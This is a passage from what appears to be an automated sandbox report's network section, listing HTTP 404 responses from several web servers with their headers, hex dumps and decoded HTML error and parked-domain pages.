6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:11:58 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b5ZvPtRhUlbgd6ONKMjWbXaoAqljdmaPMTRB2s%2Fbi6WcDYYUN3nlC4cIdH4rcemOlzry82ceMTb6WE5krFVDHX6rp3XZhsByGm5EY7rJjdi59eMOQ8%2BSwMXmFDkScXu9uA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da998248a306b05-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5aMnOrTDMLSCD9d3MNs5NP5MCIfiHRg%2FMrugTcVU3tK8Dxn28uRBzqqmnq4v9gRwb8qMCygHf%2BrOriebiqqnMTUbsJ9CD4YYQLhaxYhdUaSBSqIizJPZWpRg%2BmT7JTsgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da9983488fc4689-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIep7RoKluhaXx9zrtMoL1J8SZJi0wHdCaYMe2LCN5%2FfySoQnREHGHdGqG9AZMv9Z2IBmhm3zDIRqIVeAVIF6%2Fqh3pzvb8WX4viL6YIO0acjihyFtOdJ08Iyr8elpocQdQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da9984479884784-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1932&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xinIiWNRIcHwM5X8ZP5mjpq%2BfM1UOr8lkUaDr6egOXumJ72RaajFtJcZbT5MNV7e7IpoWi1SixLr9K5fdes9AIZucXajbfrI1Cg%2B5kmWwfisbIVDwpxydofQgskZL9XrYg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da99854ddcd3ab5-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 30 39 31 32 31 30 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:20 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:22 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:57 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:00 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 